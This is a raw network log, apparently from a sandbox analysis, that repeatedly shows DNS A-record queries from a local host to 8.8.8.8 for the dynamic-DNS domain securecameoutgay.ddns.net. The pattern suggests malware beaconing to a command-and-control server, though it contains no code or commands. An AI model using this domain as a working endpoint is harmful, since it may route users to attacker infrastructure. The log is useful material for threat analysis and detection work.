                                                    Oct 12, 2024 23:05:57.871401072 CEST192.168.2.148.8.8.80x9cffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.878051996 CEST192.168.2.148.8.8.80x9cffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.884953976 CEST192.168.2.148.8.8.80xdffcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.891592026 CEST192.168.2.148.8.8.80xdffcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.898215055 CEST192.168.2.148.8.8.80xdffcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.904757977 CEST192.168.2.148.8.8.80xdffcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.911715031 CEST192.168.2.148.8.8.80xdffcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.918385983 CEST192.168.2.148.8.8.80xe8d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.925702095 CEST192.168.2.148.8.8.80xe8d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.932173014 CEST192.168.2.148.8.8.80xe8d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.938776016 CEST192.168.2.148.8.8.80xe8d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.945482016 CEST192.168.2.148.8.8.80xe8d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.952243090 CEST192.168.2.148.8.8.80x43f9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.958947897 CEST192.168.2.148.8.8.80x43f9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.966485023 CEST192.168.2.148.8.8.80x43f9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.973335028 CEST192.168.2.148.8.8.80x43f9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.980128050 CEST192.168.2.148.8.8.80x43f9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.988562107 CEST192.168.2.148.8.8.80x47e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:57.995769978 CEST192.168.2.148.8.8.80x47e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.004235029 CEST192.168.2.148.8.8.80x47e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.013722897 CEST192.168.2.148.8.8.80x47e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.020808935 CEST192.168.2.148.8.8.80x47e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.027626991 CEST192.168.2.148.8.8.80x5f43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.034794092 CEST192.168.2.148.8.8.80x5f43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.041616917 CEST192.168.2.148.8.8.80x5f43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.048403978 CEST192.168.2.148.8.8.80x5f43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.055069923 CEST192.168.2.148.8.8.80x5f43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.061872005 CEST192.168.2.148.8.8.80x1cdbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.068587065 CEST192.168.2.148.8.8.80x1cdbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.075287104 CEST192.168.2.148.8.8.80x1cdbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.082053900 CEST192.168.2.148.8.8.80x1cdbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.088912964 CEST192.168.2.148.8.8.80x1cdbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.095733881 CEST192.168.2.148.8.8.80x4538Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.102799892 CEST192.168.2.148.8.8.80x4538Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.109297037 CEST192.168.2.148.8.8.80x4538Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.115884066 CEST192.168.2.148.8.8.80x4538Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.122533083 CEST192.168.2.148.8.8.80x4538Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.129441023 CEST192.168.2.148.8.8.80x4860Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.136251926 CEST192.168.2.148.8.8.80x4860Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.142755032 CEST192.168.2.148.8.8.80x4860Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.150368929 CEST192.168.2.148.8.8.80x4860Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.157031059 CEST192.168.2.148.8.8.80x4860Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.164036036 CEST192.168.2.148.8.8.80xa880Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.170794964 CEST192.168.2.148.8.8.80xa880Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.177133083 CEST192.168.2.148.8.8.80xa880Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.184042931 CEST192.168.2.148.8.8.80xa880Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.190577984 CEST192.168.2.148.8.8.80xa880Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.196894884 CEST192.168.2.148.8.8.80xfa29Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.203296900 CEST192.168.2.148.8.8.80xfa29Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.210653067 CEST192.168.2.148.8.8.80xfa29Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.217242956 CEST192.168.2.148.8.8.80xfa29Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.223896980 CEST192.168.2.148.8.8.80xfa29Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.230565071 CEST192.168.2.148.8.8.80x35a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.237711906 CEST192.168.2.148.8.8.80x35a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.244429111 CEST192.168.2.148.8.8.80x35a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.252458096 CEST192.168.2.148.8.8.80x35a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.259840965 CEST192.168.2.148.8.8.80x35a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.266639948 CEST192.168.2.148.8.8.80x6049Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.273873091 CEST192.168.2.148.8.8.80x6049Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.280482054 CEST192.168.2.148.8.8.80x6049Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.287224054 CEST192.168.2.148.8.8.80x6049Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.293755054 CEST192.168.2.148.8.8.80x6049Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.300174952 CEST192.168.2.148.8.8.80xf4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.306701899 CEST192.168.2.148.8.8.80xf4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.313640118 CEST192.168.2.148.8.8.80xf4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.319912910 CEST192.168.2.148.8.8.80xf4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.326312065 CEST192.168.2.148.8.8.80xf4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.333256960 CEST192.168.2.148.8.8.80xbf12Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.339924097 CEST192.168.2.148.8.8.80xbf12Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.349116087 CEST192.168.2.148.8.8.80xbf12Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.355743885 CEST192.168.2.148.8.8.80xbf12Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.362391949 CEST192.168.2.148.8.8.80xbf12Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.368913889 CEST192.168.2.148.8.8.80x64b4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.375602961 CEST192.168.2.148.8.8.80x64b4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.383641958 CEST192.168.2.148.8.8.80x64b4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.390537977 CEST192.168.2.148.8.8.80x64b4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.397197962 CEST192.168.2.148.8.8.80x64b4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.403856039 CEST192.168.2.148.8.8.80x25c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.410775900 CEST192.168.2.148.8.8.80x25c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.418217897 CEST192.168.2.148.8.8.80x25c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.425896883 CEST192.168.2.148.8.8.80x25c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.432730913 CEST192.168.2.148.8.8.80x25c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.439603090 CEST192.168.2.148.8.8.80x52f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.446541071 CEST192.168.2.148.8.8.80x52f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.454085112 CEST192.168.2.148.8.8.80x52f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.460941076 CEST192.168.2.148.8.8.80x52f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.467588902 CEST192.168.2.148.8.8.80x52f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.474107027 CEST192.168.2.148.8.8.80x38a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.480878115 CEST192.168.2.148.8.8.80x38a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.487828970 CEST192.168.2.148.8.8.80x38a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.494945049 CEST192.168.2.148.8.8.80x38a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.501481056 CEST192.168.2.148.8.8.80x38a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.508094072 CEST192.168.2.148.8.8.80xa900Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.514729023 CEST192.168.2.148.8.8.80xa900Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.521173954 CEST192.168.2.148.8.8.80xa900Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.527949095 CEST192.168.2.148.8.8.80xa900Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.534861088 CEST192.168.2.148.8.8.80xa900Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.541898966 CEST192.168.2.148.8.8.80x39e5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.548593044 CEST192.168.2.148.8.8.80x39e5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.555361032 CEST192.168.2.148.8.8.80x39e5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.562561035 CEST192.168.2.148.8.8.80x39e5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.569185019 CEST192.168.2.148.8.8.80x39e5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.576527119 CEST192.168.2.148.8.8.80x5f5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.583873987 CEST192.168.2.148.8.8.80x5f5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.590876102 CEST192.168.2.148.8.8.80x5f5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.597969055 CEST192.168.2.148.8.8.80x5f5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.604747057 CEST192.168.2.148.8.8.80x5f5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.611325979 CEST192.168.2.148.8.8.80x6cbaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.618908882 CEST192.168.2.148.8.8.80x6cbaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.626040936 CEST192.168.2.148.8.8.80x6cbaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.632858038 CEST192.168.2.148.8.8.80x6cbaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.640182018 CEST192.168.2.148.8.8.80x6cbaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.647300005 CEST192.168.2.148.8.8.80xe22bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.653966904 CEST192.168.2.148.8.8.80xe22bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.660681009 CEST192.168.2.148.8.8.80xe22bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.667078972 CEST192.168.2.148.8.8.80xe22bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.673604012 CEST192.168.2.148.8.8.80xe22bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.680252075 CEST192.168.2.148.8.8.80xcc55Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.687047005 CEST192.168.2.148.8.8.80xcc55Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.693772078 CEST192.168.2.148.8.8.80xcc55Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.700572014 CEST192.168.2.148.8.8.80xcc55Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.707705975 CEST192.168.2.148.8.8.80xcc55Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.714673042 CEST192.168.2.148.8.8.80x6a31Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.721751928 CEST192.168.2.148.8.8.80x6a31Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.728741884 CEST192.168.2.148.8.8.80x6a31Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.735845089 CEST192.168.2.148.8.8.80x6a31Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.743189096 CEST192.168.2.148.8.8.80x6a31Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.750205994 CEST192.168.2.148.8.8.80x8248Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.757117987 CEST192.168.2.148.8.8.80x8248Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.763591051 CEST192.168.2.148.8.8.80x8248Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.770945072 CEST192.168.2.148.8.8.80x8248Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.777662992 CEST192.168.2.148.8.8.80x8248Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.784034014 CEST192.168.2.148.8.8.80x8e75Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.790340900 CEST192.168.2.148.8.8.80x8e75Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.796963930 CEST192.168.2.148.8.8.80x8e75Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.803543091 CEST192.168.2.148.8.8.80x8e75Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.810146093 CEST192.168.2.148.8.8.80x8e75Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.816570997 CEST192.168.2.148.8.8.80x493fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.823000908 CEST192.168.2.148.8.8.80x493fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.830204964 CEST192.168.2.148.8.8.80x493fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.837002993 CEST192.168.2.148.8.8.80x493fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.844264030 CEST192.168.2.148.8.8.80x493fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.852180004 CEST192.168.2.148.8.8.80xb878Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.859051943 CEST192.168.2.148.8.8.80xb878Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.865797043 CEST192.168.2.148.8.8.80xb878Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.872916937 CEST192.168.2.148.8.8.80xb878Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.879693031 CEST192.168.2.148.8.8.80xb878Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.886523008 CEST192.168.2.148.8.8.80x1b0aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.893865108 CEST192.168.2.148.8.8.80x1b0aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.900645971 CEST192.168.2.148.8.8.80x1b0aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.907732010 CEST192.168.2.148.8.8.80x1b0aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.913949966 CEST192.168.2.148.8.8.80x1b0aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.920675039 CEST192.168.2.148.8.8.80x73c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.927314997 CEST192.168.2.148.8.8.80x73c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.934015989 CEST192.168.2.148.8.8.80x73c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.940665960 CEST192.168.2.148.8.8.80x73c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.947379112 CEST192.168.2.148.8.8.80x73c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.954035044 CEST192.168.2.148.8.8.80xb141Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.960784912 CEST192.168.2.148.8.8.80xb141Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.967827082 CEST192.168.2.148.8.8.80xb141Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.974241972 CEST192.168.2.148.8.8.80xb141Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.980674028 CEST192.168.2.148.8.8.80xb141Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.987255096 CEST192.168.2.148.8.8.80xf26Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:58.993805885 CEST192.168.2.148.8.8.80xf26Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.000354052 CEST192.168.2.148.8.8.80xf26Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.007220984 CEST192.168.2.148.8.8.80xf26Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.013792038 CEST192.168.2.148.8.8.80xf26Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.020572901 CEST192.168.2.148.8.8.80xfe7bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.027080059 CEST192.168.2.148.8.8.80xfe7bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.033330917 CEST192.168.2.148.8.8.80xfe7bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.039714098 CEST192.168.2.148.8.8.80xfe7bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.046809912 CEST192.168.2.148.8.8.80xfe7bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.053307056 CEST192.168.2.148.8.8.80x5fccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.059565067 CEST192.168.2.148.8.8.80x5fccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.068656921 CEST192.168.2.148.8.8.80x5fccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.075469017 CEST192.168.2.148.8.8.80x5fccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.082119942 CEST192.168.2.148.8.8.80x5fccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.089005947 CEST192.168.2.148.8.8.80xa408Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.095935106 CEST192.168.2.148.8.8.80xa408Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.102372885 CEST192.168.2.148.8.8.80xa408Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.109304905 CEST192.168.2.148.8.8.80xa408Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.116962910 CEST192.168.2.148.8.8.80xa408Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.123681068 CEST192.168.2.148.8.8.80xac23Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.130578041 CEST192.168.2.148.8.8.80xac23Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.137525082 CEST192.168.2.148.8.8.80xac23Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.144246101 CEST192.168.2.148.8.8.80xac23Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.151057959 CEST192.168.2.148.8.8.80xac23Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
